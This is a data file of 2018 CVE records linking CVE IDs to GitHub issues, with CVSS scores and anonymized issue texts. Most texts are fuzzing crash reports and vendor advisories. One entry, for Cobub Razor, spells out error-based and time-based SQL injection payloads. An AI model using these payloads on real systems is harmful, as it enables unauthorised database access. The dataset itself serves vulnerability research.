  32477. "CVE_ID": "CVE-2018-7866",
  32478. "Issue_Url_old": "https://github.com/libming/libming/issues/118",
  32479. "Issue_Url_new": "https://github.com/libming/libming/issues/118",
  32480. "Repo_new": "libming/libming",
  32481. "Issue_Created_At": "2018-03-07T08:42:15Z",
  32482. "description": "Null pointer dereference vulnerability in APITAG APITAG . Hi, i found a null pointer dereference bug in the libming NUMBERTAG It crashed in function APITAG details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32483. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32484. "severity": "MEDIUM",
  32485. "baseScore": 6.5,
  32486. "impactScore": 3.6,
  32487. "exploitabilityScore": 2.8
  32488. },
  32489. {
  32490. "CVE_ID": "CVE-2018-7867",
  32491. "Issue_Url_old": "https://github.com/libming/libming/issues/116",
  32492. "Issue_Url_new": "https://github.com/libming/libming/issues/116",
  32493. "Repo_new": "libming/libming",
  32494. "Issue_Created_At": "2018-03-07T08:21:57Z",
  32495. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32496. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32497. "severity": "MEDIUM",
  32498. "baseScore": 6.5,
  32499. "impactScore": 3.6,
  32500. "exploitabilityScore": 2.8
  32501. },
  32502. {
  32503. "CVE_ID": "CVE-2018-7868",
  32504. "Issue_Url_old": "https://github.com/libming/libming/issues/113",
  32505. "Issue_Url_new": "https://github.com/libming/libming/issues/113",
  32506. "Repo_new": "libming/libming",
  32507. "Issue_Created_At": "2018-03-07T07:50:29Z",
  32508. "description": "heap buffer overflow in APITAG . Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32509. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32510. "severity": "MEDIUM",
  32511. "baseScore": 6.5,
  32512. "impactScore": 3.6,
  32513. "exploitabilityScore": 2.8
  32514. },
  32515. {
  32516. "CVE_ID": "CVE-2018-7869",
  32517. "Issue_Url_old": "https://github.com/libming/libming/issues/119",
  32518. "Issue_Url_new": "https://github.com/libming/libming/issues/119",
  32519. "Repo_new": "libming/libming",
  32520. "Issue_Created_At": "2018-03-07T09:01:56Z",
  32521. "description": "There are a lot of memory leaks in libming NUMBERTAG which is trigged in dcinit(in APITAG ./swftoc NUMBERTAG mem leaks swf /dev/null FILETAG vim FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG fe8e in dcinit PATHTAG NUMBERTAG ebf2 in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in realloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG fd6b in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in realloc ( PATHTAG NUMBERTAG d NUMBERTAG d in APITAG PATHTAG NUMBERTAG fd6b in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f NUMBERTAG in push PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG e7b8 in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG b NUMBERTAG e in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG eccd in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) ...... ...... POC FILE: URLTAG",
  32522. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  32523. "severity": "HIGH",
  32524. "baseScore": 7.5,
  32525. "impactScore": 3.6,
  32526. "exploitabilityScore": 3.9
  32527. },
  32528. {
  32529. "CVE_ID": "CVE-2018-7870",
  32530. "Issue_Url_old": "https://github.com/libming/libming/issues/117",
  32531. "Issue_Url_new": "https://github.com/libming/libming/issues/117",
  32532. "Repo_new": "libming/libming",
  32533. "Issue_Created_At": "2018-03-07T08:29:46Z",
  32534. "description": "Invalid memory address dereference in APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32535. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32536. "severity": "MEDIUM",
  32537. "baseScore": 6.5,
  32538. "impactScore": 3.6,
  32539. "exploitabilityScore": 2.8
  32540. },
  32541. {
  32542. "CVE_ID": "CVE-2018-7871",
  32543. "Issue_Url_old": "https://github.com/libming/libming/issues/120",
  32544. "Issue_Url_new": "https://github.com/libming/libming/issues/120",
  32545. "Repo_new": "libming/libming",
  32546. "Issue_Created_At": "2018-03-07T09:12:13Z",
  32547. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32548. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32549. "severity": "HIGH",
  32550. "baseScore": 8.8,
  32551. "impactScore": 5.9,
  32552. "exploitabilityScore": 2.8
  32553. },
  32554. {
  32555. "CVE_ID": "CVE-2018-7872",
  32556. "Issue_Url_old": "https://github.com/libming/libming/issues/114",
  32557. "Issue_Url_new": "https://github.com/libming/libming/issues/114",
  32558. "Repo_new": "libming/libming",
  32559. "Issue_Created_At": "2018-03-07T08:03:05Z",
  32560. "description": "Invalid memory address dereference in APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function APITAG details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32561. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32562. "severity": "MEDIUM",
  32563. "baseScore": 6.5,
  32564. "impactScore": 3.6,
  32565. "exploitabilityScore": 2.8
  32566. },
  32567. {
  32568. "CVE_ID": "CVE-2018-7873",
  32569. "Issue_Url_old": "https://github.com/libming/libming/issues/111",
  32570. "Issue_Url_new": "https://github.com/libming/libming/issues/111",
  32571. "Repo_new": "libming/libming",
  32572. "Issue_Created_At": "2018-03-07T07:37:59Z",
  32573. "description": "heap buffer overflow in function APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32574. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32575. "severity": "MEDIUM",
  32576. "baseScore": 6.5,
  32577. "impactScore": 3.6,
  32578. "exploitabilityScore": 2.8
  32579. },
  32580. {
  32581. "CVE_ID": "CVE-2018-7874",
  32582. "Issue_Url_old": "https://github.com/libming/libming/issues/115",
  32583. "Issue_Url_new": "https://github.com/libming/libming/issues/115",
  32584. "Repo_new": "libming/libming",
  32585. "Issue_Created_At": "2018-03-07T08:11:56Z",
  32586. "description": "Invalid memory address dereference in strlenext (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function strlenext .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32587. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32588. "severity": "MEDIUM",
  32589. "baseScore": 6.5,
  32590. "impactScore": 3.6,
  32591. "exploitabilityScore": 2.8
  32592. },
  32593. {
  32594. "CVE_ID": "CVE-2018-7875",
  32595. "Issue_Url_old": "https://github.com/libming/libming/issues/112",
  32596. "Issue_Url_new": "https://github.com/libming/libming/issues/112",
  32597. "Repo_new": "libming/libming",
  32598. "Issue_Created_At": "2018-03-07T07:44:35Z",
  32599. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
  32600. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32601. "severity": "MEDIUM",
  32602. "baseScore": 6.5,
  32603. "impactScore": 3.6,
  32604. "exploitabilityScore": 2.8
  32605. },
  32606. {
  32607. "CVE_ID": "CVE-2018-7876",
  32608. "Issue_Url_old": "https://github.com/libming/libming/issues/109",
  32609. "Issue_Url_new": "https://github.com/libming/libming/issues/109",
  32610. "Repo_new": "libming/libming",
  32611. "Issue_Created_At": "2018-03-07T07:15:31Z",
  32612. "description": "memory exhaustion in APITAG Version: APITAG libming NUMBERTAG latest version) A memory exhaustion vulnerability was found in function APITAG which allow attackers to cause a denial of service via a crafted file. ERRORTAG POC FILE: URLTAG",
  32613. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32614. "severity": "MEDIUM",
  32615. "baseScore": 6.5,
  32616. "impactScore": 3.6,
  32617. "exploitabilityScore": 2.8
  32618. },
  32619. {
  32620. "CVE_ID": "CVE-2018-7877",
  32621. "Issue_Url_old": "https://github.com/libming/libming/issues/110",
  32622. "Issue_Url_new": "https://github.com/libming/libming/issues/110",
  32623. "Repo_new": "libming/libming",
  32624. "Issue_Created_At": "2018-03-07T07:28:31Z",
  32625. "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN) ERRORTAG POC FILE: URLTAG",
  32626. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32627. "severity": "MEDIUM",
  32628. "baseScore": 6.5,
  32629. "impactScore": 3.6,
  32630. "exploitabilityScore": 2.8
  32631. },
  32632. {
  32633. "CVE_ID": "CVE-2018-7998",
  32634. "Issue_Url_old": "https://github.com/jcupitt/libvips/issues/893",
  32635. "Issue_Url_new": "https://github.com/jcupitt/libvips/issues/893",
  32636. "Repo_new": "jcupitt/libvips",
  32637. "Issue_Created_At": "2018-03-05T03:39:48Z",
  32638. "description": "NULL APITAG function pointer dereference vulnerability in APITAG NUMBERTAG Description In libvips NUMBERTAG and the master branch, A null function pointer dereference vulnerability was found in region.c, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted image file NUMBERTAG Reproduce This issue can be reproduced by the following command: vips im_copy $POC FILETAG NUMBERTAG Cause Analyze Backtrack is as flow: CODETAG The source code of APITAG ERRORTAG From gdb, we can see that the programe fails to check the function pointer in line NUMBERTAG which results in a segmentation fault: CODETAG FILETAG",
  32639. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32640. "severity": "HIGH",
  32641. "baseScore": 7.5,
  32642. "impactScore": 5.9,
  32643. "exploitabilityScore": 1.6
  32644. },
  32645. {
  32646. "CVE_ID": "CVE-2018-7999",
  32647. "Issue_Url_old": "https://github.com/silnrsi/graphite/issues/22",
  32648. "Issue_Url_new": "https://github.com/silnrsi/graphite/issues/22",
  32649. "Repo_new": "silnrsi/graphite",
  32650. "Issue_Created_At": "2018-03-05T10:02:56Z",
  32651. "description": "null pointer dereference vulnerability in APITAG NUMBERTAG Description A null pointer dereference vulnerability was found in APITAG which may allow attackers to cause a denial of service or possibly have unspecified other impact via a crafted font type file NUMBERTAG How to reproduce The issue can be reproduced by the following command: APITAG NUMBERTAG Cause Analyze The program failed to verify pointer m_silf in APITAG CODETAG FILETAG",
  32652. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32653. "severity": "HIGH",
  32654. "baseScore": 8.8,
  32655. "impactScore": 5.9,
  32656. "exploitabilityScore": 2.8
  32657. },
  32658. {
  32659. "CVE_ID": "CVE-2018-8048",
  32660. "Issue_Url_old": "https://github.com/flavorjones/loofah/issues/144",
  32661. "Issue_Url_new": "https://github.com/flavorjones/loofah/issues/144",
  32662. "Repo_new": "flavorjones/loofah",
  32663. "Issue_Created_At": "2018-03-15T14:52:43Z",
  32664. "description": "placeholder issue.",
  32665. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32666. "severity": "MEDIUM",
  32667. "baseScore": 6.1,
  32668. "impactScore": 2.7,
  32669. "exploitabilityScore": 2.8
  32670. },
  32671. {
  32672. "CVE_ID": "CVE-2018-8056",
  32673. "Issue_Url_old": "https://github.com/cobub/razor/issues/162",
  32674. "Issue_Url_new": "https://github.com/cobub/razor/issues/162",
  32675. "Repo_new": "cobub/razor",
  32676. "Issue_Created_At": "2018-03-10T16:58:30Z",
  32677. "description": "Some vulnerability in Cobub Razor NUMBERTAG SQL injection Code source: PATHTAG at line NUMBERTAG The string of the 'channel_name' and 'platform' parameter transmission is completely without check and filter,so if the string is passed, it will lead to the existence of SQL injection APITAG could result in full information disclosure. The SQL injection type: error based and AND/OR time based blind Parameter: channel_name,platform APITAG string is also applied to 'platform' at the same time NUMBERTAG channel_name=test\" AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT NUMBERTAG b NUMBERTAG SELECT APITAG NUMBERTAG FROM APITAG GROUP BY x)a) APITAG NUMBERTAG channel_name=test\" AND SLEEP NUMBERTAG APITAG NUMBERTAG physical path Leakage The pages leaked the absolute path: URL: FILETAG URLTAG APITAG",
  32678. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  32679. "severity": "HIGH",
  32680. "baseScore": 7.5,
  32681. "impactScore": 3.6,
  32682. "exploitabilityScore": 3.9
  32683. },
  32684. {
  32685. "CVE_ID": "CVE-2018-8096",
  32686. "Issue_Url_old": "https://github.com/datalust/seq-tickets/issues/675",
  32687. "Issue_Url_new": "https://github.com/datalust/seq-tickets/issues/675",
  32688. "Repo_new": "datalust/seq-tickets",
  32689. "Issue_Created_At": "2018-03-12T22:08:19Z",
  32690. "description": "Authentication bypass in builds up to and including NUMBERTAG A critical issue has been reported affecting versions of Seq up to and including NUMBERTAG This application logic error permits a user with access to the HTTP API gain full access to the Seq server. Seq servers with authentication enabled need to be upgraded to the latest Seq release available at URLTAG Customers without active support/maintenance should contact EMAILTAG for information regarding a down level patch. Timeline NUMBERTAG On February NUMBERTAG th NUMBERTAG we were notified privately of the existence of the bug NUMBERTAG We immediately verified the issue and evaluated options for mitigation; having determined that a low risk fix was possible, we commenced work on a new version to resolve the issue NUMBERTAG Within NUMBERTAG hours of the report we emailed customers and active trial users with information about the bug and availability of the fixed release; we also produced and included a down level patch for customers running unsupported/legacy versions NUMBERTAG To allow for upgrades to take place, a minimum NUMBERTAG day window was provided before raising this publicly visible report _In the interests of our customers, Datalust will not confirm or disclose security issues until an investigation has been completed and patches or mitigations are available._ Details Authentication and authorization are separate in the NUMBERTAG Seq security model. Unauthenticated requests are allowed access to various assets required for correctly displaying the APITAG page; further authorization is bypassed when allowed unauthenticated requests are processed. Among these assets are a group of four system settings including authentication options and some details of the authentication provider. A missing check for the HTTP PUT method inadvertently enabled write access to these settings, through which the authentication provider can be modified or disabled. Impact By disabling authentication, an attacker may gain admin access to the Seq web application. Through the plug in \"app\" mechanism, this can be used to execute code on the Seq server with the capabilities/access level of the APITAG process. The bug cannot be used to read user passwords, which for basic authentication are stored by Seq as salted PBKDF2 hashes. The bug is not exploitable through a port locked down as ingestion only, i.e. using the APITAG configuration setting. Patch availability The bug is fixed in Seq versions NUMBERTAG onwards. All users with a supported Seq license relying on authentication should update immediately to the most recent Seq NUMBERTAG ersion (version FILETAG at the time of writing. Users without current support/maintenance can access a patch for earlier versions by contacting EMAILTAG . Postmortem We have identified two main factors that enabled this bug to remain undetected: Programmatic security configuration: the endpoints in question do appear to perform correct security checks, however because the responsibility for implementing this was spread between several unrelated blocks of code, the override was not obvious to inspection A test blindspot covering code added very early in product development: the settings mechanism was added very early in product development, at a time when integration test coverage was low; as testing has matured along with the rest of the product, some older code remained with low test coverage As a result, a new, declarative security model has been implemented for Seq NUMBERTAG This provides a basis for more precise test coverage, and also produces auditable documentation directly from the API security configuration. We have also undertaken a further review of Seq NUMBERTAG Additional test coverage has been added, and in versions from NUMBERTAG onwards we took the additional step of centralizing a public URL/method white list to improve auditability and reduce the likelihood of re introducing this kind of issue in later code changes. We're sorry for any inconvenience caused by this bug and would like to reiterate our commitment to producing the most secure Seq possible, and our dedication to handling security issues in a responsible and timely manner. Customers with questions or concerns may contact EMAILTAG for assistance. Datalust is grateful to Daniel Chactoura of APITAG for identifying and privately disclosing this issue.",
  32691. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32692. "severity": "CRITICAL",
  32693. "baseScore": 9.8,
  32694. "impactScore": 5.9,
  32695. "exploitabilityScore": 3.9
  32696. },
  32697. {
  32698. "CVE_ID": "CVE-2018-8097",
  32699. "Issue_Url_old": "https://github.com/pyeve/eve/issues/1101",
  32700. "Issue_Url_new": "https://github.com/pyeve/eve/issues/1101",
  32701. "Repo_new": "pyeve/eve",
  32702. "Issue_Created_At": "2018-01-14T11:42:00Z",
  32703. "description": "Where can I report security vulnerability?. Hi, I found a potential vulnerability in the latest version of Eve. Is there any security related email I can send my report? Thanks :)",
  32704. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32705. "severity": "CRITICAL",
  32706. "baseScore": 9.8,
  32707. "impactScore": 5.9,
  32708. "exploitabilityScore": 3.9
  32709. },
  32710. {
  32711. "CVE_ID": "CVE-2018-8715",
  32712. "Issue_Url_old": "https://github.com/embedthis/appweb/issues/610",
  32713. "Issue_Url_new": "https://github.com/embedthis/appweb/issues/610",
  32714. "Repo_new": "embedthis/appweb",
  32715. "Issue_Created_At": "2018-03-12T02:11:40Z",
  32716. "description": "Basic/digest bypass with null password. Overview A security vulnerability affecting Appweb versions up to and including NUMBERTAG with a specially crafted WWW Authenticate header has been identified. This bulletin discusses this flaw and its implications. Summary A HTTP request with specially crafted, invalid WWW Authenticate header field with a missing password and known username will bypass the password check. Sites using basic or digest authentication may be impacted. Sites using web based forms for authentication will not be impacted. Description The WWW Authenticate header supplies the username and password for authentication of the request. If an invalid WWW Authenticate header is used with a known, valid username and without supplying a password, the request will bypass authentication and be accepted. The exploit requires: A site supporting browser based basic and digest authentication. Sites using web based forms for username and password are not impacted. A specially crafted WWW Authenticate is required with a missing password field. An empty password will not suffice. A valid user name must be supplied. Note: Browsers cannot initiate an exploit via normal web pages. Threat Scope Versions up to and including NUMBERTAG Fixed in NUMBERTAG Severity High. An attacker could bypass authentication. Remedy Apply the quick patch below to Appweb NUMBERTAG to NUMBERTAG Alternatively, upgrade to Appweb NUMBERTAG when it is released. Appweb NUMBERTAG is highly compatible with Appweb NUMBERTAG and upgrading should be relatively straightforward. Quick Patch ERRORTAG Thanks This issue was discovered by security researcher, Davide Quarta ( APITAG and Truel IT, has reported this vulnerability to Beyond Security\u2019s APITAG Secure Disclosure program. Please contact Embedthis if you require further information, test code or assistance at EMAILTAG .",
  32717. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32718. "severity": "HIGH",
  32719. "baseScore": 8.1,
  32720. "impactScore": 5.9,
  32721. "exploitabilityScore": 2.2
  32722. },
  32723. {
  32724. "CVE_ID": "CVE-2018-8717",
  32725. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/419",
  32726. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/419",
  32727. "Repo_new": "joyplus/joyplus-cms",
  32728. "Issue_Created_At": "2018-03-14T08:19:20Z",
  32729. "description": "\u7f51\u7ad9\u5b58\u5728csrf. joyplus cms\u7528\u6237\u7ba1\u7406\u6dfb\u52a0\u5904\u5b58\u5728csrf\u6f0f\u6d1e\u3002 paylod\uff1a CODETAG FILETAG",
  32730. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32731. "severity": "HIGH",
  32732. "baseScore": 8.8,
  32733. "impactScore": 5.9,
  32734. "exploitabilityScore": 2.8
  32735. },
  32736. {
  32737. "CVE_ID": "CVE-2018-8766",
  32738. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/421",
  32739. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/421",
  32740. "Repo_new": "joyplus/joyplus-cms",
  32741. "Issue_Created_At": "2018-03-16T04:00:29Z",
  32742. "description": "joyplus cms NUMBERTAG has File upload results in getshell. joyplus cms NUMBERTAG has File upload results in getshell url: APITAG FILETAG FILETAG",
  32743. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32744. "severity": "CRITICAL",
  32745. "baseScore": 9.8,
  32746. "impactScore": 5.9,
  32747. "exploitabilityScore": 3.9
  32748. },
  32749. {
  32750. "CVE_ID": "CVE-2018-8767",
  32751. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/420",
  32752. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/420",
  32753. "Repo_new": "joyplus/joyplus-cms",
  32754. "Issue_Created_At": "2018-03-16T03:45:39Z",
  32755. "description": "joyplus cms NUMBERTAG has Cross Site Scripting. joyplus cms NUMBERTAG has Cross Site Scripting: payload\uff1a CODETAG FILETAG",
  32756. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  32757. "severity": "MEDIUM",
  32758. "baseScore": 4.8,
  32759. "impactScore": 2.7,
  32760. "exploitabilityScore": 1.7
  32761. },
  32762. {
  32763. "CVE_ID": "CVE-2018-8804",
  32764. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1025",
  32765. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1025",
  32766. "Repo_new": "imagemagick/imagemagick",
  32767. "Issue_Created_At": "2018-03-15T05:43:27Z",
  32768. "description": "double free. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Modules APITAG Delegates (built in): bzlib djvu fftw flif fontconfig fpx freetype jbig jng jp2 jpeg lcms ltdl openexr pangocairo png raw tiff webp x xml zlib ASAN OUTPUT APITAG System Configuration APITAG version NUMBERTAG Environment APITAG system, version and so on): ubuntu NUMBERTAG server i NUMBERTAG Additional information: Found by: Wang Yan APITAG",
  32769. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32770. "severity": "HIGH",
  32771. "baseScore": 8.8,
  32772. "impactScore": 5.9,
  32773. "exploitabilityScore": 2.8
  32774. },
  32775. {
  32776. "CVE_ID": "CVE-2018-8806",
  32777. "Issue_Url_old": "https://github.com/libming/libming/issues/128",
  32778. "Issue_Url_new": "https://github.com/libming/libming/issues/128",
  32779. "Repo_new": "libming/libming",
  32780. "Issue_Created_At": "2018-03-18T18:01:55Z",
  32781. "description": "heap use after free in APITAG (decompile.c). On latest version of libming, there is a heap use after free in APITAG function of decompile.c, which could be triggered by the POC below. To reproduce the issue, run: PATHTAG $POC POC could be downloaded at: FILETAG OUTPUT: header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG NUMBERTAG SWF_DOACTION / APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffec NUMBERTAG d0 sp NUMBERTAG ffec NUMBERTAG c8 READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG d in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG f NUMBERTAG a8dbfc NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
  32782. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32783. "severity": "MEDIUM",
  32784. "baseScore": 6.5,
  32785. "impactScore": 3.6,
  32786. "exploitabilityScore": 2.8
  32787. },
  32788. {
  32789. "CVE_ID": "CVE-2018-8807",
  32790. "Issue_Url_old": "https://github.com/libming/libming/issues/129",
  32791. "Issue_Url_new": "https://github.com/libming/libming/issues/129",
  32792. "Repo_new": "libming/libming",
  32793. "Issue_Created_At": "2018-03-18T18:28:57Z",
  32794. "description": "heap use after free in APITAG (decompile.c). On latest version of libming, these is a heap use after free in function APITAG of decompile.c, which could be triggered by the POC below. To reproduce the issue, run: PATHTAG $POC POC could be downloaded at: FILETAG OUTPUT: PATHTAG PATHTAG header indicates a filesize of NUMBERTAG but filesize is NUMBERTAG APITAG APITAG NUMBERTAG Note: APITAG and/or APITAG are not NUMBERTAG SWF_DOACTION / APITAG NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG at pc NUMBERTAG eed4 bp NUMBERTAG ffe NUMBERTAG b NUMBERTAG sp NUMBERTAG ffe NUMBERTAG b NUMBERTAG READ of size NUMBERTAG at NUMBERTAG thread T NUMBERTAG eed3 in APITAG PATHTAG NUMBERTAG ee in APITAG PATHTAG NUMBERTAG e6 in APITAG PATHTAG NUMBERTAG e6 in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG af NUMBERTAG in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in APITAG PATHTAG NUMBERTAG b NUMBERTAG in main PATHTAG NUMBERTAG fd2c9a NUMBERTAG c NUMBERTAG in __libc_start_main APITAG NUMBERTAG ERRORTAG NUMBERTAG d3 ( PATHTAG ERRORTAG NUMBERTAG d3)",
  32795. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32796. "severity": "MEDIUM",
  32797. "baseScore": 6.5,
  32798. "impactScore": 3.6,
  32799. "exploitabilityScore": 2.8
  32800. },
  32801. {
  32802. "CVE_ID": "CVE-2018-8808",
  32803. "Issue_Url_old": "https://github.com/radare/radare2/issues/9725",
  32804. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9725",
  32805. "Repo_new": "radareorg/radare2",
  32806. "Issue_Created_At": "2018-03-19T17:43:50Z",
  32807. "description": "heap buffer overflow in r_asm_disassemble APITAG Working environment: PATHTAG Ubuntu NUMBERTAG File format of the file you reverse: Dalvik dex Architecture/bits of the file: Arm/dex version NUMBERTAG r2 v output: radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG gd NUMBERTAG faff commit: APITAG build NUMBERTAG Expected behavior: successfully analyzing dex file Actual behavior: heap buffer overflow under ASAN Steps to reproduce the behavior NUMBERTAG compile radare2 with: ASAN='address' FILETAG NUMBERTAG run: radare2 A $POC NUMBERTAG the POC is attached: The sanitizer output and backtrace is NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG bfc1 at pc NUMBERTAG f NUMBERTAG da7b NUMBERTAG bp NUMBERTAG ffd NUMBERTAG e NUMBERTAG sp NUMBERTAG ffd NUMBERTAG READ of size NUMBERTAG at NUMBERTAG bfc1 thread T NUMBERTAG f NUMBERTAG da7b NUMBERTAG in __asan_memcpy ( PATHTAG NUMBERTAG f NUMBERTAG e NUMBERTAG de in r_asm_disassemble FILETAG PATHTAG NUMBERTAG f NUMBERTAG d5a4b NUMBERTAG in r_core_anal_op PATHTAG NUMBERTAG f NUMBERTAG d5b NUMBERTAG b5 in fcn_callconv PATHTAG NUMBERTAG f NUMBERTAG d5b NUMBERTAG b5 in r_core_anal_all PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG e2ab in cmd_anal_all PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG in cmd_anal PATHTAG NUMBERTAG f NUMBERTAG d NUMBERTAG d8 in r_cmd_call PATHTAG NUMBERTAG f NUMBERTAG d4fefe2 in r_core_cmd_subst_i PATHTAG 